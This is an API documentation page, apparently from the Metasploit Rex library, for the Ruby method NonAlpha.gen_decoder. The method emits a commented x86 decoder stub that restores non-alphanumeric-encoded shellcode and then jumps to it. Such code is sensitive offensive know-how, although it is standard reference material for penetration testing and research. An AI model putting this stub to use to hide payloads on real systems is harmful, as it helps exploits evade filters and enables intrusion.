Method: Rex::Encoder::NonAlpha.gen_decoder

Defined in:
lib/rex/encoder/nonalpha.rb

.gen_decoderObject 



10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
 
# File 'lib/rex/encoder/nonalpha.rb', line 10

def NonAlpha.gen_decoder
  decoder =
    "\x66\xB9\xFF\xFF" +
    "\xEB\x19"  +               # Jmp to table
    "\x5E"      +               # pop esi
    "\x8B\xFE"  +               # mov edi, esi      - Get table addr
    "\x83\xC7"  + "A" +         # add edi, tablelen - Get shellcode addr
    "\x8B\xD7"  +               # mov edx, edi      - Hold end of table ptr
    "\x3B\xF2"  +               # cmp esi, edx
    "\x7D\x0B"  +               # jle to end
    "\xB0\x7B"  +               # mov eax, 0x7B     - Set up eax with magic
    "\xF2\xAE"  +               # repne scasb       - Find magic!
    "\xFF\xCF"  +               # dec edi           - scasb purs us one ahead
    "\xAC"      +               # lodsb
    "\x28\x07"  +               # subb [edi], al
    "\xEB\xF1"  +               # jmp BACK!
    "\xEB"      + "B" +         # jmp [shellcode]
    "\xE8\xE2\xFF\xFF\xFF"
end